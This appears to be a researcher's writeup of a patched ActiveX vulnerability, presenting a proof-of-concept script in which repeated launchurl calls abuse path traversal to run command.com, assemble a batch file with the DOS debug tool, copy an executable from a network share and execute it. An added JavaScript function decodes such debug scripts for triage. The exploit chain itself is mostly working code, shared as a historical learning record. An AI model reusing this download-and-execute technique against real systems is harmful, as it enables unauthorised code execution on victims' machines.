While working on MSRC case 7571 — which involved using a vulnerable launchurl method to run local executables — I found a variation that went further: it was possible to use the same technique to assemble a small binary using the debug command, fetch a remote file from a network share, and then execute it. This is the proof-of-concept script showing that chain of steps, each driven by repeated launchurl calls to command.com.

// Creates file d1 on Desktop containing (as text) these bytes: e 100 63 6F 70 79 20 5C 5C 31 32 37 2E 30 2E 30 2E 31 5C 74 65 73 74 5C 73 6F
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo e 100 63 6F 70 79 20 5C 5C 31 32 37 2E 30 2E 30 2E 31 5C 74 65 73 74 5C 73 6F>d1\x0d .cmd');

// Creates file d2 on Desktop containing (as text) these bytes: e 118 6C 6F 2E 65 78 65
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo e 118 6C 6F 2E 65 78 65>d2\x0d .cmd');

// Creates file d3 on Desktop containing these bytes: rip
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo rip>d3\x0d .cmd');

// Creates file d4 on Desktop containing these bytes: 100
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo 100>d4\x0d .cmd');

// Creates file d5 on Desktop containing these bytes: rcx
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo rcx>d5\x0d .cmd');

// Creates file d6 on Desktop containing these bytes: 1e
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo 1e>d6\x0d .cmd');

// Creates file d7 on Desktop containing these bytes: d 100
// This command is just for me, to debug. We don't really need it.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo d 100>d7\x0d .cmd');

// Creates file d8 on Desktop containing these bytes: n getremotefile.bat
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo n getremotefile.bat>d8\x0d .cmd');

// Creates file d9 on Desktop containing these bytes: w
// We can just quit (close the cmd window) after this, but for this test, I left it open.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C echo w>d9\x0d .cmd');

// Creates file debug.txt on Desktop with all the previous files concatenated.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C copy d1+d2+d3+d4+d5+d6+d7+d8+d9 debug.txt\x0d .cmd');

// Runs debug with "debug.txt" as its input; debug executes all those commands,
// creating another file called "getremotefile.bat" which contains this: copy \\127.0.0.1\test\solo.exe
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C debug < debug.txt\x0d .cmd');

// Executes the getremotefile.bat, copying the remote file to the desktop.
obj1.launchurl('http://www.google.com%../../../../windows/system32/command.com " /C getremotefile.bat\x0d .cmd');

// Executes the downloaded remote file.
obj1.launchurl('http://www.google.com%../../../../solo.exe " .cmd');

The underlying primitive is a launchurl method on a vulnerable ActiveX control (obj1) that accepts a URL but can be manipulated with a path traversal (%../../../../) to invoke command.com instead of performing a browser navigation. Each call writes a small fragment of a debug script to a separate file on the Desktop. Once all fragments are concatenated into debug.txt, the debug command (the legacy DOS debugger, which can enter raw bytes into memory and write them out to a file) reads it as input: the e commands place the hex bytes at offset 100, rcx sets the length to 1e, n names the output file, and w writes it. The result is a batch file (getremotefile.bat) that copies an executable from a network share. The final call runs that executable. It is a multi-step bootstrap chain that relies entirely on tools already present in a standard Windows installation.
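For anyone triaging a leftover debug.txt like the one built above, this added example (not part of the original proof of concept) reconstructs the file name and content that such a debug input script would write. The function name decodeDebugScript and the sample constant are hypothetical; it handles only the commands this page uses and assumes BX is 0, so CX alone is the length.

```javascript
// Added example: reconstruct the file a debug input script would write.
// Handles only the commands used on this page: e, rip, rcx, d, n, w.
// Assumption: BX is 0 (fresh debug session), so CX alone is the byte count.
function decodeDebugScript(script) {
  const mem = new Map();          // offset -> byte value entered with "e"
  let name = null, length = null, written = false, pendingReg = null;
  for (const raw of script.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '') continue;
    if (pendingReg !== null) {    // the line after rcx/rip is the new register value
      if (pendingReg === 'cx') length = parseInt(line, 16);
      pendingReg = null;
      continue;
    }
    const [cmd, ...args] = line.split(/\s+/);
    switch (cmd.toLowerCase()) {
      case 'e': {                 // e <offset> <byte> <byte> ...
        const base = parseInt(args[0], 16);
        args.slice(1).forEach((b, i) => mem.set(base + i, parseInt(b, 16)));
        break;
      }
      case 'rcx': pendingReg = 'cx'; break;   // CX = number of bytes "w" writes
      case 'rip': pendingReg = 'ip'; break;   // does not affect the written file
      case 'n': name = args.join(' '); break; // output file name
      case 'w': written = true; break;        // write CX bytes starting at offset 100h
      default: break;                         // d, q, ... do not change the output
    }
  }
  if (!written || name === null || length === null) return null;
  let content = '';
  for (let i = 0; i < length; i++) {
    content += String.fromCharCode(mem.get(0x100 + i) ?? 0);
  }
  return { name, length, content };
}

// Constructed sample: the nine fragments d1..d9 from the script above, concatenated.
const SAMPLE_DEBUG_TXT = [
  'e 100 63 6F 70 79 20 5C 5C 31 32 37 2E 30 2E 30 2E 31 5C 74 65 73 74 5C 73 6F',
  'e 118 6C 6F 2E 65 78 65',
  'rip', '100', 'rcx', '1e', 'd 100', 'n getremotefile.bat', 'w',
].join('\r\n');

console.log(decodeDebugScript(SAMPLE_DEBUG_TXT));
```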

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.